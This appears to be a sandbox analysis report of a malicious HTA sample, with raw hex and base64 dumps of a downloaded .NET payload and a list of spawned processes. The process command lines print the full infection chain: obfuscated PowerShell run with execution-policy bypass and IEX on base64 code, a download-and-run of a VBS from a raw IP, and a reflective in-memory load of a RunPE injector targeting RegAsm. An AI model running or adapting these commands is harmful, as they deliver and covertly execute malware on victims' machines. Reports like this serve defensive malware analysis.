                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                2024-09-25 16:50:13 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                2024-09-25 16:50:13 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                2024-09-25 16:50:13 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:12:49:58
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                Wow64 process (32bit):true
                                                Commandline:mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
                                                Imagebase:0x420000
                                                File size:13'312 bytes
                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                                                Imagebase:0x790000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:12:50:02
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                                                Imagebase:0xc10000
                                                File size:2'141'552 bytes
                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:12:50:04
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
                                                Imagebase:0xf30000
                                                File size:46'832 bytes
                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
                                                Imagebase:0x1b0000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:9
                                                Start time:12:50:10
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
